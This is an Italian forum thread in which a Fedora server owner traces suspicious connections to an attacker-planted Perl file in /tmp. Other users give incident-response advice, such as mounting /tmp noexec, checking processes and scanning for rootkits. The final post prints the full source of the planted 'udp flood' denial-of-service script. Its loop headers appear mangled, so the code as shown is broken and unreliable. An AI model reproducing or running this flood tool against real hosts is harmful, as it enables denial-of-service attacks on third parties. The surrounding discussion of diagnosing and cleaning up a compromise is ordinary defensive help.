Connessioni sospette

[clochard]

Ciao a tutti,
Ho appena lanciato il comando netstat -taupen é ho notato qualche connessione sospetta, per chiari motivi ho sostituito il mio numero IP con delle X (in basso).
Qualcuno sa dirmi che tipo di programma é lanciato dal numero IP che si connette (8229/-X11 che cos'é?)?.

Ho notato che se mi connetto con il browser all'indirizzo 64.111.111.132:9900 finisco su un programma che fa dei ping (penso che sia uno scan di porte).

Sapete come posso bloccare queste connessioni?

Grazie!
Eccovi il risultato di netstat:


Proto Local Address Foreign Address State
User Inode PID/Program name

tcp XXX.XXX.XXX.XXX:34139 64.111.111.132:9900 ESTABLISHED 48 26306 8229/-X11

tcp XXX.XXX.XXX.XXX:37771 64.111.111.132:9900 ESTABLISHED 48 84781 20034/-X11

tcp XXX.XXX.XXX.XXX:38451 64.111.111.132:9900 ESTABLISHED 48 93161 21675/-X11

[Habanero]

X11 è il server grafico X-windows, la base delle interfaccie grafiche in ambiente *nix.

L'ip in questione si riferisce ad una certa DREAMHOST ituata a Los Angeles.

Non so se questo puo' esserti d'aiuto...

[clochard]

Grazie per la tua risposta.
In effetti ho un server linux Fedora e non capisco che tipo di programma possa essere sto -X11.

L'unica alternativa puo' essere un'attacco a frontpage che sul mio server non é attivo su alcun sito perché non lo uso ma l'estensione é comunque presente sul server.

Non é la prima volta che mi capita,tempo fa avevo lo setsso problema e Apache che girava enormemente.

Non ho le competenze per poter eliminare il problema, quindi se avete altre idee, sono benvenute !

[clochard]

Bo,
dopo qualche ricerca ho notato che nella cartella /tmp/ c'era un file perl "upd.pl" che invia dei floods (attaco DOS).
Il problema é che non capisco come hanno fatto a mettermi questo file nel server.

Qualcuno sa come posso impedire di scrivere file perl e di eseguirli.

La cartella /tmp ha tutti i permessi e non posso cambiarli per evitare problemi con le applicazioni del server.

Qualche idea?

Ultima cosa: Qualcuno sa dirmi come faccio a sapere da dove é stato uploadato questo file?

Grazie.

[Habanero]

ti sposto nel forum linux dove sicuramente avrai più risposte.

[prometeus]

in genere si fa una partizione a se per /tmp e /var/tmp e le si monta con l'opzione noexec. In questo modo non potranno essere eseguiti binari script o quant'altro risiedenti su quella partizione.
Se ti hanno piazzato quel file è possibile che abbiano sfruttato qualche vulnerabilità di qualche sito in php che immagino tu abbia sul server.
IO indagherei prima per bene su cosa realizza quelle connessioni. Il PID lo ricavi da netstat e poi dai un bel
ps -uwwp PID e vedi bene cosa realizza quelle connessioni.

Teoricamente andrebbe staccata la macchina dalla rete e realizzata una bella indagine in tutta sicurezza per capire cosa è successo. Il fatto che siano penetrati nel tuo sistema (da quello che dici) può aver implicato conseguenze più serie che un semplice script perl. Userei eventuali tool di ricerca di rootkit, verificherei che i moduli caricati dal kernel (su macchine esposte è consigliato usare kernel monolitici senza supporto ai moduli).
Insomma ci sono tante operazioni da effettuare, cerca magari una bella guida sull'"incident response".

[clochard]

Ciao,
prima di tutto grazie per la tua super-risposta!

In effeti non ho le competenze tecniche per fare quello che mi consigli.
Pero' vorrei proprio sapere da dove sono passati.
Immagino che abbiano "uploadato" il file da qualche parte, che ne pensi? C'é un modo di sapere da quale sito sono passati?

Per curiosità eccoti loscript perl:

#!/usr/bin/perl
################################################## ###
# udp flood.
#
# gr33ts: meth, etech, skrilla, datawar, fr3aky, etc.
#
# --/odix
################################################## ####

use Socket;

$ARGC=@ARGV;

if ($ARGC !=3) {
printf "$0 <ip> <port> <time>\n";
printf "if arg1/2 =0, randports/continous packets.\n";
exit(1);
}

my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[1];
$time=$ARGV[2];

socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

printf "udp flood - odix\n";

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpackets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto randpackets;
}

packets:
for (; {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

randpackets:
for (; {
$size=$rand x $rand x $rand;
$port=int(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}